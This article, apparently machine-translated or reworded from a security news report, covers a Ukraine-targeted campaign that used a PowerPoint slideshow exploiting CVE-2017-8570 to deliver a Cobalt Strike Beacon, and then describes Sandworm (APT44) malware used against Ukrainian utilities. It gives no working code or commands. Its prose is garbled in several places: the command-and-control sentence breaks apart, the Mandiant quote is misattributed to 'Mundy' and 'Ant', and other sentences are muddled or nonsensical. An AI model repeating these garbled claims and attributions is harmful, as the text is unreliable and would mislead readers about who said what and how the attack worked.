Cybersecurity researchers have discovered a targeted operation against Ukraine that leverages a nearly seven-year-old flaw in Microsoft Office to perform Cobalt Strike on compromised systems.
According to Deep Instinct, this attack chain occurred in late 2023 and used a PowerPoint slideshow file ('signal-2023-12-20-160512.ppsx') as the starting point, with the file name “Signal Instant''. Shared via messaging app.
That said, although the Computer Emergency Response Team of Ukraine (CERT-UA) has discovered two different campaigns that used messaging apps to distribute malware, there is no actual evidence that PPSX files were distributed in this manner. There is no evidence of this. Vector of the past.
Just last week, government agencies reported that the Ukrainian military was targeted by the UAC-0184 group via messaging and dating platforms offering malware and open source such as HijackLoader (also known as GHOSTPULSE and SHADOWLADDER), XWorm, and Remcos RAT. It has become clear that the number of cases is increasing. Programs such as sigtop and tusc to extract data from your computer.
Security researcher Ivan Kosarev said, “The PPSX (PowerPoint Slideshow) file appears to be an old instruction manual for the U.S. military's mine-clearing blade (MCB) for tanks.'' “PPSX files contain remote relationships with external OLE objects.”
This includes an exploitation of CVE-2017-8570 (CVSS score: 7.8), a currently patched remote code execution bug in Office that allows an attacker to create a specially crafted Open a file and run a remote script hosted on Weavesilk[.]space.
A highly obfuscated script then launches an HTML file containing JavaScript code. This sets persistence on the host via the Windows registry and drops the next stage payload that impersonates the Cisco AnyConnect VPN client.
The payload contains a dynamic link library (DLL) that ultimately injects a cracked Cobalt Strike Beacon, a legitimate penetration testing tool, directly into system memory and runs a command and control (C2) server Pixel”) for further instructions.[.]fun”).
This DLL also includes functionality to check if it is running inside a virtual machine and evade detection by security software.
Deep Instinct said it could not link the attack to any specific attacker or group, nor could it rule out the possibility of a red team exercise. The exact end goal of the intrusion is also unknown.
“The decoy contains military-related content, suggesting that it targets military personnel,” Kosarev said.
“But the domain name is weavesilk[.]space and petapixel[.]Fun disguised as a discreet generative art site (weavesilk)[.]com) and a popular photo site (petapixel)[.]com). These are unrelated and it's a bit puzzling why attackers would use them specifically to fool military personnel. ”
This disclosure reveals that approximately 20 energy, water and heating suppliers in Ukraine have confirmed that Sandworm (also known as APT44, FROZENBARENTS, Seashell Blizzard, UAC-0002, and Voodoo Bear) is responsible for all destructive and destructive attacks on the country. responsible for most of the strategy.
This attack uses Kapeka (also known as ICYWELL, KnuckleTouch, QUEUESEED, and WrongSense) and its Linux variant BIASBOAT, as well as malware such as GOSSIPFLOW and LOADGRIP, to disrupt critical business operations.
GOSSIPFLOW is a Golang-based SOCKS5 proxy, while LOADGRIP is an ELF binary written in C and used to load BIASBOAT on a compromised Linux host.
Sandworm is a prolific and adaptable threat group associated with Unit 74455 within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). Known to have been active since at least 2009, this adversary is a hacktivist with three hacks and leaks, including XakNet Team, Cyber Army of Russia_Reborn, and Solntsepek. He is also tied to Persona.
“APT44, backed by Russian military intelligence, is a dynamic and operationally mature threat actor actively engaged in a full range of espionage, attack and influence operations,” Mundy said. Ant said, explaining that Advanced Persistent Threats (APTs) are responsible for multiple attacks. -Continued efforts since January 2022 to help Russia gain wartime advantage.
“The scope of APT44’s activities is global and reflects Russia’s broader national interests and ambitions. A long-term pattern of activity shows that APT44 is tasked with a variety of strategic priorities, and is , is likely to be seen as a flexible instrument of power that can 'respond to both permanent and emerging information requirements. ”
